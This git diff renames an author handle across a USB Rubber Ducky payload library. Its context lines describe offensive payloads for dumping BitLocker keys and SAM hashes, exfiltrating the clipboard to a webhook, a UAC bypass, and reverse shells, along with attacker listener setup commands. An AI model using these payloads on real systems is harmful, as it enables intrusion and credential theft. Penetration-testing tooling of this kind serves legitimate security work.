diff --git a/payloads/extensions/community/DETECT_FINISHED b/payloads/extensions/community/DETECT_FINISHED index 3af4600..75fc23c 100644 --- a/payloads/extensions/community/DETECT_FINISHED +++ b/payloads/extensions/community/DETECT_FINISHED @@ -1,6 +1,6 @@ EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: diff --git a/payloads/extensions/community/POWERSHELL_DOWNLOAD b/payloads/extensions/community/POWERSHELL_DOWNLOAD index 9e67d3b..3b50b52 100644 --- a/payloads/extensions/community/POWERSHELL_DOWNLOAD +++ b/payloads/extensions/community/POWERSHELL_DOWNLOAD @@ -1,6 +1,6 @@ EXTENSION POWERSHELL_DOWNLOAD REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM Downloads the desired file via powershell REM Use the method you want to use, via the specific function, define the URL and the output. diff --git a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION index 2738fa7..e64dae1 100644 --- a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION +++ b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION @@ -1,6 +1,6 @@ EXTENSION ROLLING_POWERSHELL_EXECUTION REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM OS: Windows REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum diff --git a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE index 41df572..230b58d 100644 --- a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE +++ b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE @@ -1,7 +1,7 @@ EXTENSION WINDOWS11_CONSOLE_DOWNGRADE REM_BLOCK Version: 1.0 - Author: 0iphor13 + Author: 0i41E Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. END_REM diff --git a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION index 9e817e0..419b6e7 100644 --- a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION +++ b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION @@ -1,6 +1,6 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION REM VERSION 1.1 - REM Author: 0iphor13 + REM Author: 0i41E REM Executes the desired program with elevated privileges REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM additional extensions diff --git a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL index 597325b..a0cada8 100644 --- a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL +++ b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL @@ -1,6 +1,6 @@ EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/BitLockerKeyDump/payload.txt b/payloads/library/credentials/BitLockerKeyDump/payload.txt index cee6125..aedd6b4 100644 --- a/payloads/library/credentials/BitLockerKeyDump/payload.txt +++ b/payloads/library/credentials/BitLockerKeyDump/payload.txt @@ -1,7 +1,7 @@ REM BitLockerKeyDump REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection @@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT END_REM END_EXTENSION -REM Extension made by 0iphor13 to signalize the payloads end +REM Extension made by 0i41E to signalize the payloads end EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: @@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED END_FUNCTION END_EXTENSION -REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys +REM Extension made by 0i41E for fileless exfiltration via Lock Keys EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/BitLockerKeyDump/readme.md b/payloads/library/credentials/BitLockerKeyDump/readme.md index 7fd6559..5a7bc76 100644 --- a/payloads/library/credentials/BitLockerKeyDump/readme.md +++ b/payloads/library/credentials/BitLockerKeyDump/readme.md @@ -1,6 +1,6 @@ **Title: BitLockerKeyDump** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/credentials/SamDumpDucky/README.md b/payloads/library/credentials/SamDumpDucky/README.md index 384a32e..e1e8ef2 100644 --- a/payloads/library/credentials/SamDumpDucky/README.md +++ b/payloads/library/credentials/SamDumpDucky/README.md @@ -1,6 +1,6 @@ **Title: SamDumpDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 2.0
@@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.

**!Disclaimer! samdump2 has proven to be unreliable in the recent past.** -![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) +![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) diff --git a/payloads/library/credentials/SamDumpDucky/payload.txt b/payloads/library/credentials/SamDumpDucky/payload.txt index 2c501e0..cb74144 100644 --- a/payloads/library/credentials/SamDumpDucky/payload.txt +++ b/payloads/library/credentials/SamDumpDucky/payload.txt @@ -1,6 +1,6 @@ REM Title: SamDumpDucky REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes. -REM Author: 0iphor13 +REM Author: 0i41E REM Version: 2.0 REM Category: Credentials REM Attackmodes: HID, Storage @@ -36,10 +36,10 @@ EXTENSION DETECT_READY CAPSLOCK END_EXTENSION -REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here +REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here EXTENSION WINDOWS_ELEVATED_EXECUTION REM VERSION 1.1 - REM Author: 0iphor13 + REM Author: 0i41E REM Executes the desired program with elevated privileges REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM additional extensions @@ -71,10 +71,10 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION END_EXTENSION -REM Extension by 0iphor13, to signalize the successful execution of the payload +REM Extension by 0i41E, to signalize the successful execution of the payload EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: diff --git a/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt b/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt index 6447a73..1837442 100644 --- a/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt +++ b/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt @@ -1,7 +1,7 @@ REM WindowsLicenseKeyExfiltration REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry. @@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT END_REM END_EXTENSION -REM Extension made by 0iphor13 to signalize the payloads end +REM Extension made by 0i41E to signalize the payloads end EXTENSION DETECT_FINISHED REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: @@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED END_FUNCTION END_EXTENSION -REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys +REM Extension made by 0i41E for fileless exfiltration via Lock Keys EXTENSION WINDOWS_FILELESS_HID_EXFIL REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION Extension for Keystroke Reflection data exfiltration without putting files on disk. diff --git a/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md b/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md index 794ae2d..fda20ba 100644 --- a/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md +++ b/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md @@ -1,6 +1,6 @@ **Title: WindowsLicenseKeyExfiltration** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/execution/DuckyHelper/DuckyHelper.txt b/payloads/library/execution/DuckyHelper/DuckyHelper.txt index 6fc6557..26d3023 100644 --- a/payloads/library/execution/DuckyHelper/DuckyHelper.txt +++ b/payloads/library/execution/DuckyHelper/DuckyHelper.txt @@ -1,7 +1,7 @@ REM DuckyHelper REM Version 1.0 REM OS: Windows 10 -REM Author: 0iphor13 +REM Author: 0i41E REM UAC bypass for privilege escalation (Method FodHelper) REM AV will notify, but payload will still be executed diff --git a/payloads/library/exfiltration/ClipBoard-Creep/README.md b/payloads/library/exfiltration/ClipBoard-Creep/README.md index 67cc32b..58ecdef 100644 --- a/payloads/library/exfiltration/ClipBoard-Creep/README.md +++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md @@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat ### #HOOK ### Define your webhook under #HOOK -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png) ### #CALLBACK_DELAY ### Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png) After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png) diff --git a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt index a9a01dc..7851df7 100644 --- a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt +++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt @@ -1,10 +1,10 @@ REM Clipboard-Creep REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server. -REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep +REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep EXTENSION PASSIVE_WINDOWS_DETECT @@ -52,7 +52,7 @@ END_EXTENSION EXTENSION EXTENSION Rolling_Powershell_Execution REM VERSION 1.0 - REM Author: 0iphor13 + REM Author: 0i41E REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Requirements: PayloadStudio v.1.3 minimum REM Starts Powershell in uncommon ways to avoid basic detection @@ -132,7 +132,7 @@ END_EXTENSION EXTENSION Detect_Finished REM VERSION 1.0 - REM AUTHOR: 0iphor13 + REM AUTHOR: 0i41E REM_BLOCK DOCUMENTATION USAGE: diff --git a/payloads/library/exfiltration/HashDumpDucky/README.md b/payloads/library/exfiltration/HashDumpDucky/README.md index 9e7171c..9c97e74 100644 --- a/payloads/library/exfiltration/HashDumpDucky/README.md +++ b/payloads/library/exfiltration/HashDumpDucky/README.md @@ -1,6 +1,6 @@ **Title: HashDumpDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0

@@ -17,6 +17,6 @@ Bring some time... This payload will run an obfuscated script to dump user hashe Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go # Exfiltrate the out.txt file and try to crack the hashes. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png) *props to Nikhil Mittal* diff --git a/payloads/library/exfiltration/HashDumpDucky/payload.txt b/payloads/library/exfiltration/HashDumpDucky/payload.txt index f6e8156..56361c9 100644 --- a/payloads/library/exfiltration/HashDumpDucky/payload.txt +++ b/payloads/library/exfiltration/HashDumpDucky/payload.txt @@ -1,7 +1,7 @@ REM HashDumpDucky REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Requirements: RubberDucky mk2/DuckyScript 3.0 REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection. diff --git a/payloads/library/general/EngagementDucky/readme.md b/payloads/library/general/EngagementDucky/readme.md index 18fbf67..f373412 100644 --- a/payloads/library/general/EngagementDucky/readme.md +++ b/payloads/library/general/EngagementDucky/readme.md @@ -1,6 +1,6 @@ **Title: EngagementDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0

@@ -10,7 +10,7 @@ Version: 1.0

EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.
Step up your game and demonstrate impact in a few seconds without leaving your scope.

-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png) **Instruction:** 1. Configure USB identifiers @@ -18,4 +18,4 @@ Step up your game and demonstrate impact in a few seconds without leaving your s 2. Place inject.bin onto your Ducky 3. Plug in your Ducky and wait until finish... walk away -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png) diff --git a/payloads/library/general/duckin8or/payload.txt b/payloads/library/general/duckin8or/payload.txt index 938b518..ae6eb79 100644 --- a/payloads/library/general/duckin8or/payload.txt +++ b/payloads/library/general/duckin8or/payload.txt @@ -54,7 +54,7 @@ REM # * Be responsible. REM # # REM # Kudos: # REM # * RootJunky - "Three Payloads from LOCK Key Double Press" # -REM # * 0iphor13 - "EngagementDucky", "ReverseDuckyII" # +REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" # REM # * the-jcksn - "ducky_crab" # REM # * I am Jakoby - "-RD-PineApple" # REM # * Hak5 Team # diff --git a/payloads/library/prank/-RD-AcidBurn/README.md b/payloads/library/prank/-RD-AcidBurn/README.md index 8414320..77808ba 100644 --- a/payloads/library/prank/-RD-AcidBurn/README.md +++ b/payloads/library/prank/-RD-AcidBurn/README.md @@ -105,7 +105,7 @@ Arf * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) +* [0i41E](https://github.com/0i41E) * [PhilSutter](https://github.com/PhilSutter) diff --git a/payloads/library/prank/-RD-JumpScare/README.md b/payloads/library/prank/-RD-JumpScare/README.md index 3781747..53ef0dc 100644 --- a/payloads/library/prank/-RD-JumpScare/README.md +++ b/payloads/library/prank/-RD-JumpScare/README.md @@ -95,7 +95,7 @@ Arf * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) -* [0iphor13](https://github.com/0iphor13) +* [0i41E](https://github.com/0i41E) * [PhilSutter](https://github.com/PhilSutter) diff --git a/payloads/library/prank/EternalLock/payload.txt b/payloads/library/prank/EternalLock/payload.txt index 2aaee31..bf5eeef 100644 --- a/payloads/library/prank/EternalLock/payload.txt +++ b/payloads/library/prank/EternalLock/payload.txt @@ -1,7 +1,7 @@ REM EternalLock REM Version 1.0 REM OS: Windows / Unix -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out) diff --git a/payloads/library/prank/SoundChangeDuck/README.md b/payloads/library/prank/SoundChangeDuck/README.md index 40617b8..3b6450c 100644 --- a/payloads/library/prank/SoundChangeDuck/README.md +++ b/payloads/library/prank/SoundChangeDuck/README.md @@ -1,6 +1,6 @@ **Title: SoundChangeDuck** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0

diff --git a/payloads/library/prank/SoundChangeDuck/payload.txt b/payloads/library/prank/SoundChangeDuck/payload.txt index 5ad9118..215d76f 100644 --- a/payloads/library/prank/SoundChangeDuck/payload.txt +++ b/payloads/library/prank/SoundChangeDuck/payload.txt @@ -1,7 +1,7 @@ REM SoundChangeDuck REM Version 1.0 REM OS: Windows -REM Author: 0iphor13 +REM Author: 0i41E REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail. REM You can of course decide which system sounds you want to change. diff --git a/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl b/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl index d4a64c3..5ee0755 100644 --- a/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl +++ b/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl @@ -15,7 +15,7 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . # -# Modified by 0iphor13 for PingZhellDucky +# Modified by 0i41E for PingZhellDucky # # # diff --git a/payloads/library/remote_access/PingZhellDucky/README.md b/payloads/library/remote_access/PingZhellDucky/README.md index 51cfea5..305749b 100644 --- a/payloads/library/remote_access/PingZhellDucky/README.md +++ b/payloads/library/remote_access/PingZhellDucky/README.md @@ -1,6 +1,6 @@ **Title: PingZhellDucky** -

Author: 0iphor13
+

Author: 0i41E
OS: Windows & Unix
Version: 1.2
Requirements: DuckyScript 3.0, perl

@@ -20,16 +20,16 @@ After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is di With automatic setup: Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png) Define the IP of your attacking machine between the quotes at the ATTACKER section -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!) -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png) Start the client -> `perl PingZhellDucky.pl` -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)

Plug your Ducky into a Windows target.
Achieve reverse shell.
@@ -38,7 +38,7 @@ Achieve reverse shell.
**Instruction Version 2:** Without automatic setup: Define INSTALL and set it to FALSE -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png) Upload PingZhellDucky.pl onto your attacking machine. Install dependencies, if needed: @@ -50,10 +50,10 @@ Disable ICMP replies by the OS: `sysctl -w net.ipv4.icmp_echo_ignore_all=1` Start the client -> `perl PingZhellDucky.pl` -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png) Define the IP of your attacking machine between the quotes at the ATTACKER section -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)

Plug your Ducky into a Windows target.
Achieve reverse shell.
diff --git a/payloads/library/remote_access/PingZhellDucky/payload.txt b/payloads/library/remote_access/PingZhellDucky/payload.txt index 4e8d257..8b6ab86 100644 --- a/payloads/library/remote_access/PingZhellDucky/payload.txt +++ b/payloads/library/remote_access/PingZhellDucky/payload.txt @@ -1,7 +1,7 @@ REM PingZhellDucky REM Version 1.2 REM OS: Windows & Unix -REM Author: 0iphor13 +REM Author: 0i41E REM Requirements: DuckScript 3.0, Perl REM Getting remote access via ICMP or perform the required setup @@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre? REM Will trigger when not using Windows - Best use with Linux DEFINE INSTALL TRUE REM Link to the PingZhellDucky.pl client - Required for installation -DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl +DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl IF ($_OS == WINDOWS) THEN diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt index 2f425ec..4a3adee 100644 --- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt +++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt @@ -1,7 +1,7 @@ REM ReverseDucky REM Version 2.0 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed. diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt index d71b496..4cb1e4c 100644 --- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt +++ b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt @@ -1,7 +1,7 @@ REM ReverseDuckyII REM Version 2.0 REM OS: Windows / Multi -REM Author: 0iphor13 +REM Author: 0i41E REM Requirement: DuckyScript 3.0 REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed. diff --git a/payloads/library/remote_access/ReverseDuckyIII/payload.txt b/payloads/library/remote_access/ReverseDuckyIII/payload.txt index 8039dd8..12fb17e 100644 --- a/payloads/library/remote_access/ReverseDuckyIII/payload.txt +++ b/payloads/library/remote_access/ReverseDuckyIII/payload.txt @@ -1,7 +1,7 @@ REM ReverseDucky3 REM Version 1.2 (End of Life - This payload won't be updated anymore) REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) -REM Author: 0iphor13 +REM Author: 0i41E REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway. REM Fill in Attacker-IP and Port in Line 18 diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md index 65fb083..29bf73a 100644 --- a/payloads/library/remote_access/ReverseDuckyPolymorph/README.md +++ b/payloads/library/remote_access/ReverseDuckyPolymorph/README.md @@ -1,6 +1,6 @@ **Title: ReverseDuckyPolymorph** -

Author: 0iphor13, Korben
+

Author: 0i41E, Korben
OS: Windows
Version: 1.1
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

@@ -17,11 +17,11 @@ Using ReverseDuckyPolymorph is easy and straight forward. - First, start a listener on your attacking machine via the tool of your choice. - Second, define the IP-Address and Port of your listening machine -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png) - Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go. # Every session you will gain via this payload will result in a different ID to verify a different pattern. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png) Credit for DS 3.0 implentation and ideas: - Korben diff --git a/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt b/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt index a4e0cdd..153c88e 100644 --- a/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt +++ b/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt @@ -1,5 +1,5 @@ REM Title: ReverseDuckyPolymorph -REM Author: 0iphor13, Korben +REM Author: 0i41E, Korben REM Version 1.1 REM Target: Windows / Linux(?) (Not tested with Powershell on Linux) diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/README.md b/payloads/library/remote_access/ReverseDuckyUltimate/README.md index 610a934..83f9a42 100644 --- a/payloads/library/remote_access/ReverseDuckyUltimate/README.md +++ b/payloads/library/remote_access/ReverseDuckyUltimate/README.md @@ -1,6 +1,6 @@ # Title: ReverseDuckyUltimate -

Author: 0iphor13
+

Author: 0i41E
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

@@ -12,14 +12,14 @@ Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

# ## Instruction -Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup). +Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup). - First: Create key.pem & cert.pem like so:
``` openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes ``` It will ask for information about the certificate - Insert whatever you want.
-![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png) - Second: Start a listener on your attacking machine which supports certificates. Examples: @@ -31,25 +31,25 @@ ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem Additionally add an unique identifier to give your Duck a name. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png) - Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go. ## Instruction - Automatic Setup - First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png) - Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky. -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png) - Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go! -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png) # -![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png) +![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png) Credit for DS 